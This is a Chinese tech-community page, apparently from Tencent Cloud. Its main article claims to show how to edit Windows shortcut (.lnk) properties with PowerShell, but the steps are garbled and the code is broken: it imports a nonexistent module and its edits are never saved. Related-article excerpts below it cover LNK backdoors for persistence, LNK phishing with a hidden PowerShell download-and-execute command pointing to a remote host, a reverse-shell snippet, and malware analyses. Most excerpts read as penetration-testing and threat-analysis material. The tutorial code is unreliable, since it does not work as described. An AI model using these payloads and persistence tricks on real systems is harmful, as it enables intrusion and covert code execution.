首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

使用Powershell编辑快捷方式(.lnk)属性

在云计算领域中,使用Powershell编辑快捷方式(.lnk)属性是一种常见的操作。快捷方式是一种常见的文件类型,用于快速访问其他文件和应用程序。在Windows操作系统中,快捷方式通常具有.lnk扩展名。

使用Powershell编辑快捷方式(.lnk)属性的方法如下:

  1. 首先,打开Windows PowerShell或者Windows PowerShell ISE。Import-Module Shell.Application$Shortcut = New-Object -ComObject WScript.Shell$ShortcutPath = "C:\path\to\shortcut.lnk"$TargetPath = $Shortcut.CreateShortcut($ShortcutPath).TargetPath$Shortcut.CreateShortcut($ShortcutPath).TargetPath = "C:\new\path\to\target" $Shortcut.CreateShortcut($ShortcutPath).Save()这将更改快捷方式的目标路径。您可以使用类似的方法编辑其他属性,例如工作目录、窗口样式、启动选项等。
  2. 使用以下命令导入所需的模块:
  3. 使用以下命令获取快捷方式的对象:
  4. 使用以下命令指定要编辑的快捷方式的路径:
  5. 使用以下命令获取快捷方式的目标路径:
  6. 使用以下命令编辑快捷方式的属性:

在腾讯云中,您可以使用云服务器、云硬盘、对象存储、CDN等产品来满足您的需求。您可以使用腾讯云的命令行工具(例如TCCLI)或者API来自动化这些操作。

推荐的腾讯云相关产品和产品介绍链接地址:

请注意,这些产品和链接地址仅供参考,具体使用效果可能因实际情况而异。

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

Window权限维持(四):快捷方式

更隐蔽的方法是修改现有合法快捷方式属性,但是生成具有不同特征的快捷方式可以为代码执行提供灵活性。...查看快捷方式属性将显示目标字段已成功修改以执行PowerShell有效负载。 ? 由于快捷方式存在于启动文件夹中,因此暂存器将在下一次Windows登录中执行,并且将与命令和控制服务器建立连接。...默认情况下,此模块将使用写字板图标伪装成可信任的应用程序。 ? 快捷方式的目标字段将使用执行Base64有效负载的PowerShell命令填充。可以将快捷方式转移并移动到启动文件夹中以保持持久性。...usemodule persistence/userland/backdoor_lnkEmpire–后门现有快捷方式查看快捷方式属性将显示目标字段已成功修改以执行PowerShell有效负载。...Empire-写字板快捷方式快捷方式的目标字段将使用执行Base64有效负载的PowerShell命令填充。可以将快捷方式转移并移动到启动文件夹中以保持持久性。

1.3K30

恶意代码分析:2.LNK文件伪装成证书传播RokRAT恶意软件(含无文件攻击)

前文介绍了文本编辑器notepad++如何被感染的,通过恶意链接引导用户下载恶意的编辑器,并分析其恶意行为。...这篇文章将翻译一篇LNK文件发起的恶意攻击,主要是LNK文件伪装成证书执行RokRAT恶意软件,并利用Powershell命令发起无文件攻击和执行相关行为。基础性技术文章,希望您喜欢!...他们发现该种基于快捷方式文件(.LNK)的恶意软件主要针对韩国用户,特别是与朝鲜相关的用户。...(CRS Report).lnk东北项目(美国国会研究服务 CRS报告).lnk Facility list.lnk设施列表.lnk 下图展示已确认的LNK文件属性。...此时,请求头中的UserAgent伪装成Googlebot,所使用的云URL如下表所示。

18910
  • 如何创建Powershell持久隐蔽后门

    用户开机后每次运行特定的快捷方式文件时触发一段恶意的powershell 代码,原始应用程序仍然启动,原始图标保留,并且没有powershell.exe窗口弹出。...1、安装后门 这次需要用到powershell攻击框架Empire,使用Empire/data/module_source/persistence/Invoke-BackdoorLNK.ps1这个脚本...-LNKPath是要利用的lnk的路径,每次打开这个lnk文件时都会执行原始的应用程序和 -EncScript后面的恶意powershell代码 先通过empire生成反弹的powershell代码 ....看到以上界面就代表后门安装完成 当我们运行navicat快捷方式的同时 可以看到powershell.exe已经悄悄的链接empire ?...4、总结 利用快捷方式去攻击,已经是一个很老的话题了,但是有时候渗透中添加启动项/服务/任务计划失败的情况下可以尝试用此方法,劫持一个经常使用的程序快捷方式,达到权限维持的效果,windows下基于powershell

    1.5K70

    EmbedExeLnk - 在 LNK 中嵌入 EXE 并自动执行

    通过在 Powershell 命令中存储原始 LNK 文件的长度(不包括附加的 EXE 数据)来解决此问题。 3.查看LNK文件的“属性”时可以看到Powershell命令。...这会溢出“属性”对话框中的文本字段并且只显示空格。 image.png 4.LNK 文件有一个可执行文件图标。...image.png 已通过将快捷方式描述(使用 HasName 标志)设置为“类型:文本文档\n大小:5.23 KB\n修改日期:01/02/2020 11:23”来解决此问题。...image.png 6.在十六进制编辑器中打开 LNK 文件时,EXE 文件清晰可见。...通过使用 XOR 对 EXE 文件数据的每个字节进行“加密”和“解密”,这一点得到了改进 完整的 LNK 目标如下所示: cmd /c powershell -windowstyle hidden $lnkpath

    2.1K30

    社工钓鱼之LNK钓鱼

    文章前言 LNK文件是一种用于指向其他文件的特殊文件,这些文件通常也被称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用, LNK钓鱼主要将图标伪装成正常图标,但是目标会执行Shell...命令 钓鱼实践 Step 1:点击Attacks—>Web Drive by—>Scripted Web Delivery,在弹出的对话框中将type类型设置为Powershell,然后单击launch...生成代码 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.129...:80/a'))" Step 2:制作一下txt文本 Step 3:制作一下powershell $file = Get-Content "Al1ex.txt" $WshShell = New-Object...文件 Step 5:后将Al1ex.lnk发送给受害者,诱导用户运行 Step 6:之后成功获得Shell 文末小结 基于LNK文件的钓鱼方式总体而言利用难度相对有点大,一般都需要通过钓鱼邮件的方式

    1.6K20

    渗透测试信息收集技巧(10)——Office钓鱼和钓鱼攻击

    首先清空所有代码,然后将复制的代码粘贴到编辑器中,关闭宏编辑窗口保存退出,双击再次运行保存的文档。...当目标机器运行文档以后,Cobalt Strike会接受到目标机器反弹的shell 目标进程会增加一个rundl32.exe进程 钓鱼攻击 CHM钓鱼 LNK钓鱼 HTA钓鱼 CHM钓鱼 CHM(Compiled...LNK钓鱼 Ink文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件通常它以快捷方式放在硬盘上,以方便使用者快速的调用。Ink钓鱼主要将图标伪装成正常图标,但是目标会执行she命令。...制作软件 : powershell生成图标 powershell生成图标,在生成图标代码文件夹中建立test.txt文件,文件内容如下图,再执行 cmd /c calc.exe 编译powershel...任何未经授权使用本文档中技术信息的行为都是严格禁止的,并可能违反《中华人民共和国网络安全法》及相关法律法规。使用者应当合法合规地运用所学知识,不得用于非法入侵、破坏信息系统等恶意活动。

    11210

    Quantum 构建工具使用新的 TTP 投递 Agent Tesla

    与过去的攻击行动相比,本次攻击转向使用 LNK 文件。 Quantum Builder 能够创建恶意文件,如 LNK、HTA 与 PowerShell,最后投递 Agent Tesla。...CMSTP 绕过 UAC 通过操作文件属性隐藏 Agent Tesla Agent Tesla 被硬编码命名为 MuUQDuaFNoGmHQE.exe,并且被最终执行: 【解密 PowerShell...代码还通过操作隐藏文件属性来隐藏 Agent Tesla 二进制文件,如下所示: 【隐藏文件】 攻击变化 感染链的另一个变种,LNK 文件被捆绑在 ZIP 压缩包中。...【通过 LNK 执行 HTA 文件】 MSHTA 执行的 HTA 文件与之前感染链中使用的文件相同,加密数组转换为字符以形成可通过 Run 方法执行的 PowerShell 代码。...【在野 HTA 文件】 LNK 生成工具 LNK 生成工具如下所示: 【LNK 生成工具】 快捷方式的构造参数有 Description、IconLocation、Target Path、Arguments

    1.5K20

    CVE-2017-8464远程命令执行漏洞(震网漏洞)复现

    2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统...漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 ...当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限...注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。...,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒。

    92220

    10 行代码,用 Python 创建一个 Windows 桌面快捷方式

    幸运的是,Anaconda (fka Continuum) 提供了启动 powershell 或命令提示符的所有基础功能,默认安装会创建一些快捷方式来做到这一点,但是,我们很难修改这些快捷方式来自定义工作目录...所以为了我们制作的快捷方式具有通用性,显然是不能进行硬编码的。 这里我们可以使用 winshell 这个第三方库,它提供了访问 Windows 上特殊目录的快捷操作方式。...生成快捷方式 在 Windows 上使用快捷方式时,可以右键单击快捷方式图标并查看属性。我们大多数人可能见过这样的事情: Winshell 提供了一个转储功能,使实际的快捷方式属性更容易查看。...例如,如果我们想查看开始菜单中现有的快捷方式,我们需要获取 .lnk 文件的完整路径,然后创建一个快捷方式对象并使用 dump 显示值。...在这个例子中,我使用的是 miniconda 使用的默认图标。

    3.9K30

    USB钓鱼几种方式总结。

    方式一:引诱目标点开“美图” 当目标点开美图(恶意LNK快捷方式文件:confidential.jpg.lnk),使目标认为他正在打开图像(confidential.jpg),HTA dropper 隐藏在快捷方式文件中...LNK将执行HTA,HTA将依次执行并删除的DLL payload,并且用诱饵图片替换快捷方式(confidential.jpg)。..." 当payload构成放在USB中,我们需要知道当前路径,%cd%将提供当前的路径名称 使用macro_pack生成lnk,这里U盘的盘符为”F:”,运行一下命令生成lnk: macro_pack.exe...构建恶意设置的快捷方式文件。...这里有个问题是setcontent-ms文件默认在“C:\Windows\System32”中打开,这样我们必须知道USB的盘符,为此使用Powershell的脚本如下: %windir%\system32

    1.3K10

    “震网三代”(CVE-2017-8464)的几种利用方法与防范

    早在6月13日,微软发布补丁修复编号为CVE-2017-8464的漏洞,本地用户或远程攻击者可以利用该漏洞生成特制的快捷方式,并通过可移动设备或者远程共享的方式导致远程代码执行,追溯到以前,NSA就承认利用过相似漏洞且以...*2)PowerShell 这个使用Powershell的方法并非先前网络上流传的CVE-2017-8464复现方法。...首先下载Export-LNKPwn.ps1 注意: -需要4.0或以上.NET库版本,作者使用了一些只有PowerShell 5.0才有的构造函数(如new()),他打算将版本要求降低到....NET 3.5 和PowerShell 2.0,这样的话模块在所有目标环境中都能被载入内存。...使用示例: C:\PS> Export-LNKPwn -LNKOutPath C:\Some\Local\Path.lnk -TargetCPLPath C:\Target\CPL\Path.cpl -

    2.1K40

    巧用符号链接移动文件夹位置

    简单的说,符号链接就是快捷方式,不过和快捷方式不同的是,符号链接会被识别为真实的文件或者文件夹。...而快捷方式这个东西,如果你在Windows下用过命令行的话,应该可以注意到快捷方式只是一个特殊的文件,它有自己的文件扩展名lnk。...好了,说了这么多,下面就来看看如何使用符号链接这个功能吧!在cmd和powershell中都有对应的创建符号链接的命令,不过这里我只介绍powershell的命令。...powershell作为cmd的替代品。假如如果有想学习Windows命令行的同学的话,最好学习powershell。cmd这种东西能不碰尽量不碰。...当然如果你右键属性查看符号链接的话,会发现他和快捷方式一样有一个小箭头,不过并没有什么影响。

    2.1K10

    Windows 中的硬链接、目录联接(软链接)、符号链接、快捷方式

    创建链接 创建链接可以通过 dos 命令 mklink 或者 powershell 中的New-Item 创建。 mklink命令的使用说明如下图所示。...inode 与 block 类似,在 NTFS 文件系统中数据对象也赋予了独一无二的文件 ID 以及与之对应的文件路径,文件路径和文件 ID 对应,文件 ID 和数据对象绑定,最终才呈现为可供用户打开、编辑的文件...快捷方式(shortcut) 快捷方式以.lnk文件方式存在,文件大小仅有几百字节,与原始文件大小无关。适用于 Explorer 等应用程序,并非 NTFS 内置机制,从Win95开始得到支持。...可以理解为另一种形式的快捷方式(shortcut),文件大小为0字节和不占用空间。可以使用相对/绝对路径,可以跨盘符,跨主机,可以使用UNC路径和网络驱动器。.../ / / 文件 文件大小仅有几百字节, 跟原文件大小无关,文件类型是.lnk。 本身无文件,为文件创建多入口。

    12010

    利用快捷方式隐藏并执行shellcode

    0x00:简介 快捷方式是win系统下为各种程序、文件、文件夹提供的一种快速启动程序。 后缀名大多为(.lnk),少见的后缀名有(.pif)、(.url)。 早期的“桌面图标lnk木马”也是危害一时。...三、恶意Ink部署 1、新建立一个text.txt并填写如下代码 cmd /c (echo powershell "($client = new-object System.Net.WebClient)...3、powershell执行1.ps1在当前目录生成“jaky.lnk” ? 部署完成 接下来 把“jaky.Ink”文件扔给受害者服务器 四、MSF开启监听 ?...二、在线查杀 1、Ink查杀http://r.virscan.org/language/zh-cn/report/e2f14da45f32b03430bd7feb7c384189 (因为快捷方式引用的是...zh-cn/report/8773a7a9dfd1a48becd614e70bc689d3 居然被查杀了 一首(凉凉)送给自己 0x04:闲言碎语 1、图标可以换成正常的应用程序的,方便隐藏 2、Ink快捷方式运行后

    1.6K20

    AveMaria 传播手段的变化

    其中包含恶意 LNK 文件、诱饵文件与其他相关文件,点击快捷方式后会通过 curl 命令下载其他恶意软件。最终,Payload 执行会使用 AveMaria 来感染失陷主机。...恶意邮件 所有的快捷方式文件都使用相同的 PowerShell 命令,在每个驱动器中检索硬编码的文件名。...LNK 文件 Avemaria 在执行时使用硬编码文件名 images.exe 在 %userprofile%\documents 下创建自身副本,以及在注册表中进行持久化。...ISO 文件中的 LNK 文件包含 PowerShell 命令与运行时解密的混淆代码。执行 LNK 文件会下载恶意的 HTA 文件,再通过 mshta.exe 来执行。...快捷方式文件 HTA 文件由 标签下的 VBScript 代码组成,在执行时生成混淆的第三阶段 PowerShell 代码。

    75520

    一个Hancitor恶意邮件活动Word文档样本的分析

    %/lnk”目录下,并调用MakeShortcut函数进行感染生成新的桌面快捷方式文件;四是利用干净文档替换恶意文档并退出。...我们可以看到,快捷方式属性中,目标类型、目标和起始位置三项都发生了变化,其中目标由“C:\Program Files (x86)\WinHex\WinHex.exe”变化为“C:\Users\admin...AppData\Roaming\lkn\WinHex - 快捷方式.lnk"。...同时,%appdata%目录下只剩下winhex.exe(其实就是werd.exe,修改为第一次双击的感染桌面快捷方式对应的进程名,本次实验环境使用的是winhex,所以werd.exe改名为winhex.exe...文档内直接包含恶意负载部分,没有利用类似powershell脚本下载恶意文件。 2、没有直接进程执行动作。不像以往恶意宏会直接执行恶意负载,作者利用感染用户桌面快捷方式的途径来达成进程启动目的。

    1.6K10

    Windows小工具:LnkDown快捷方式加载Payload

    之前看到一款俄罗斯黑阔写的的快捷方式下载木马并运行的生成工具(Shortcut Downloader),调用PowerShell创建快捷方式实现下载恶意文件并运行,要知道PowerShell在03之前是没有默认安装的...快捷方式木马并非神马新鲜玩意,但大多集中于流氓网页,正常程序快捷方式遭到恶意文件替换(本来打开的QQ想撩妹,结果弹出苍老师的播放器),如何利用快捷方式(不调用PowerShell的情况下实现)实现下载某个文件并运行呢...Echo写出ftp信息,使用ftp –s:x 参数运行下载命令 2. 语句使用&&链接,语句被执行才会继续下一步操作 3....最后执行恶意程序时使用if exist判断恶意程序是否下载,如果下载则执行 ? 思路验证 ?...,然后你总得更改下图标吧大哥,其次既然是在后台静默下载运行,我们当然不想快捷方式一闪而过,创建完快捷方式右键修改运行方式最小化,OK一个简单lnk下载者就成了。

    69670

    分析银行木马的恶意快捷方式及混淆的Powershell

    第一阶段是Windows快捷方式文件(LNK文件),第二阶段为Powershell脚本(已被ISESteriods混淆)。 其中的样本包括所有删除的文件,都可以下载。...完整的快捷方式 十六进制编辑器的结果如下。...不使用任何配置文件,其次,参数-win 1,值1代表隐藏窗口。 第二阶段– ISES 我们提取出bmp图片里面的Powershell脚本。完整的脚本如下。...在第二行中,使用了两个变量。两者都可以根据此信息重命名。变量_ / ===== \ / == \ / \ ___ /是快捷方式的targetLocation,因为它是作为参数传递的。...该快捷方式将与提供的参数一起在%StystemRoot%\ System32目录中执行Powershell 。 脚本中的最后一个函数如下。

    1.6K20
    领券